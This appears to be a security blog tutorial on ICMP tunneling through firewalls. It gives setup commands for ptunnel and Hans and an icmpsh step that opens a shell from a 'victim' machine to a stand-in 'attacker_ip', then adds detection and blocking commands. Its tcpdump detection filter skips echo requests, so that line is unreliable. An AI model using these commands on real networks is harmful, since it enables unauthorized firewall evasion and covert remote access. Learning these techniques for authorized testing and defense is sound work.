Listen to this Post
ICMP tunneling is a technique used to encapsulate TCP packets within ICMP echo request and reply packets, allowing data transmission through networks that might block traditional TCP traffic but permit ICMP traffic. This method is often used in penetration testing and network security assessments.
How It Works
ICMP tunneling works by embedding data payloads within ICMP packets (typically Type 8 – Echo Request and Type 0 – Echo Reply). Since many firewalls allow ICMP traffic for network diagnostics, this method can bypass restrictions.
Tools for ICMP Tunneling
1. ptunnel (ICMP tunneling tool)
2. icmpsh (Simple ICMP tunneling)
3. Hans (IP over ICMP)
You Should Know: Practical Implementation
1. Setting Up ptunnel for ICMP Tunneling
Step 1: Install ptunnel (Linux)
sudo apt-get install ptunnel
**Step 2: Run ptunnel on the Server (Listener)**
sudo ptunnel -x your_password
**Step 3: Connect from the Client**
sudo ptunnel -p server_ip -lp 1080 -da target_ip -dp 22 -x your_password
This forwards local port `1080` to `target_ip:22` over ICMP.
### **2. Using icmpsh for Simple Tunneling**
**Step 1: Disable ICMP Echo Replies on Host**
sudo sysctl -w net.ipv4.icmp_echo_ignore_all=1
**Step 2: Start the icmpsh Server**
python icmpsh_m.py attacker_ip victim_ip
**Step 3: Execute on Victim Machine (Windows)**
icmpsh.exe -t attacker_ip -d 500 -s 128
### **3. Hans (IP over ICMP)**
**Step 1: Install Hans**
sudo apt-get install hans
**Step 2: Start the Server**
sudo hans -s 10.1.1.1 -p your_password
**Step 3: Connect from Client**
sudo hans -c server_ip -p your_password -a 10.1.1.2
### **Detecting ICMP Tunneling**
To detect ICMP tunneling, monitor:
- Unusually large ICMP packets
- High ICMP traffic frequency
sudo tcpdump -i eth0 icmp and not icmp[icmptype]=icmp-echo
## **What Undercode Say**
ICMP tunneling is a powerful technique for bypassing network restrictions, but it can also be abused by attackers. System administrators should monitor ICMP traffic for anomalies.
### **Defensive Measures**
- Block unnecessary ICMP traffic:
sudo iptables -A INPUT -p icmp --icmp-type echo-request -j DROP
- Use IDS/IPS to detect tunneling:
sudo snort -q -A console -c /etc/snort/snort.conf -i eth0
- Rate-limit ICMP requests:
sudo iptables -A INPUT -p icmp --icmp-type echo-request -m limit --limit 1/s -j ACCEPT
For ethical hacking, always ensure proper authorization before testing ICMP tunneling techniques.
## **Expected Output:**
A functional ICMP tunnel allowing TCP traffic to bypass firewall restrictions, with proper logging and detection mechanisms in place.
**Further Reading:**
References:
Reported By: Chuckkeith How – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
